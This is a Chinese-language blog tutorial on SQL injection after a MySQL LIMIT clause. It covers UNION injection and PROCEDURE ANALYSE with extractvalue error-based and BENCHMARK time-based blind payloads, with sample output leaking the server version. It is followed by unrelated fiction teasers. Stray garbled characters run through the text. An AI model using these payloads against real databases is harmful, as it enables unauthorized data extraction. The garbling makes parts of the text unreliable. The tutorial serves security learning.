Mysql 注入之 limit 注入

參考鏈接:
https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html

一般實(shí)際過(guò)程中使用 limit 時(shí),大概有兩種情況捉蚤,一種使用order by抬驴,一種就是不使用 order by關(guān)鍵字

不存在 order by 關(guān)鍵字

執(zhí)行語(yǔ)句

select id from users limit 0,1

這種情況下的 limit 后面可以使用union進(jìn)行聯(lián)合查詢注入
執(zhí)行語(yǔ)句

select id from users limit 0,1 union select username from users;

圖片.png

存在 order by 關(guān)鍵字

執(zhí)行語(yǔ)句

select id from users order by id desc limit 0,1;

此時(shí)后面再次使用union將會(huì)報(bào)錯(cuò)

圖片.png

除了union 就沒(méi)有其他可以使用的了嗎,非也
此方法適用于5.0.0< MySQL <5.6.6版本缆巧,在limit語(yǔ)句后面的注入
MySQL 5中的SELECT語(yǔ)法:

SELECT 
    [ALL | DISTINCT | DISTINCTROW ] 
      [HIGH_PRIORITY] 
      [STRAIGHT_JOIN] 
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
    select_expr [, select_expr ...] 
    [FROM table_references 
    [WHERE where_condition] 
    [GROUP BY {col_name | expr | position} 
      [ASC | DESC], ... [WITH ROLLUP]] 
    [HAVING where_condition] 
    [ORDER BY {col_name | expr | position} 
      [ASC | DESC], ...] 
    [LIMIT {[offset,] row_count | row_count OFFSET offset}] 
    [PROCEDURE procedure_name(argument_list)] 
    [INTO OUTFILE 'file_name' export_options 
      | INTO DUMPFILE 'file_name' 
      | INTO var_name [, var_name]] 
    [FOR UPDATE | LOCK IN SHARE MODE]]

limit 關(guān)鍵字后面還可跟PROCEDUREINTO兩個(gè)關(guān)鍵字布持,但是 INTO 后面寫入文件需要知道絕對(duì)路徑以及寫入shell的權(quán)限,因此利用比較難陕悬,因此這里以PROCEDURE為例進(jìn)行注入

  • 使用 PROCEDURE函數(shù)進(jìn)行注入
    ANALYSE支持兩個(gè)參數(shù)题暖,首先嘗試一下默認(rèn)兩個(gè)參數(shù)
mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

報(bào)錯(cuò),嘗試一下對(duì)其中一個(gè)參數(shù)進(jìn)行注入捉超,這里首先嘗試報(bào)錯(cuò)注入

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

成功爆出 mysql 版本信息胧卤,證明如果存在報(bào)錯(cuò)回顯的話,可以使用報(bào)錯(cuò)注入在limit后面進(jìn)行注入
不存在回顯怎么辦拼岳,延遲注入呀
執(zhí)行命令

select id from users order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

如果 select version(); 第一個(gè)為5枝誊,則多次執(zhí)行sha(1)達(dá)到延遲效果
這里使用 sleep 進(jìn)行嘗試,但均未成功裂问,所以需要使用BENCHMARK進(jìn)行替代

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末侧啼,一起剝皮案震驚了整個(gè)濱河市牛柒,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌痊乾,老刑警劉巖皮壁,帶你破解...
    沈念sama閱讀 222,807評(píng)論 6 518
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異哪审,居然都是意外死亡蛾魄,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,284評(píng)論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門湿滓,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)滴须,“玉大人,你說(shuō)我怎么就攤上這事叽奥∪铀” “怎么了?”我有些...
    開(kāi)封第一講書人閱讀 169,589評(píng)論 0 363
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵朝氓,是天一觀的道長(zhǎng)魔市。 經(jīng)常有香客問(wèn)我,道長(zhǎng)赵哲,這世上最難降的妖魔是什么待德? 我笑而不...
    開(kāi)封第一講書人閱讀 60,188評(píng)論 1 300
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮枫夺,結(jié)果婚禮上将宪,老公的妹妹穿的比我還像新娘。我一直安慰自己橡庞,他們只是感情好较坛,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,185評(píng)論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著毙死,像睡著了一般燎潮。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上扼倘,一...
    開(kāi)封第一講書人閱讀 52,785評(píng)論 1 314
  • 城市分裂傳說(shuō)
    那天确封,我揣著相機(jī)與錄音,去河邊找鬼再菊。 笑死爪喘,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的纠拔。 我是一名探鬼主播秉剑,決...
    沈念sama閱讀 41,220評(píng)論 3 423
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼稠诲!你這毒婦竟也來(lái)了侦鹏?” 一聲冷哼從身側(cè)響起诡曙,我...
    開(kāi)封第一講書人閱讀 40,167評(píng)論 0 277
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎略水,沒(méi)想到半個(gè)月后价卤,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,698評(píng)論 1 320
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡渊涝,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,767評(píng)論 3 343
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年慎璧,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片跨释。...
    茶點(diǎn)故事閱讀 40,912評(píng)論 1 353
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡胸私,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出鳖谈,到底是詐尸還是另有隱情岁疼,我是刑警寧澤,帶...
    沈念sama閱讀 36,572評(píng)論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布蚯姆,位于F島的核電站五续,受9級(jí)特大地震影響洒敏,放射性物質(zhì)發(fā)生泄漏龄恋。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,254評(píng)論 3 336
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一凶伙、第九天 我趴在偏房一處隱蔽的房頂上張望郭毕。 院中可真熱鬧,春花似錦函荣、人聲如沸显押。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 32,746評(píng)論 0 25
  • 一樁弒父案傻挂,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)乘碑。三九已至,卻和暖如春金拒,著一層夾襖步出監(jiān)牢的瞬間兽肤,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 33,859評(píng)論 1 274
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工绪抛, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留资铡,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,359評(píng)論 3 379
  • 代替公主和親
    正文 我出身青樓幢码,卻偏偏與公主長(zhǎng)得像笤休,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子症副,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,922評(píng)論 2 361

推薦閱讀更多精彩內(nèi)容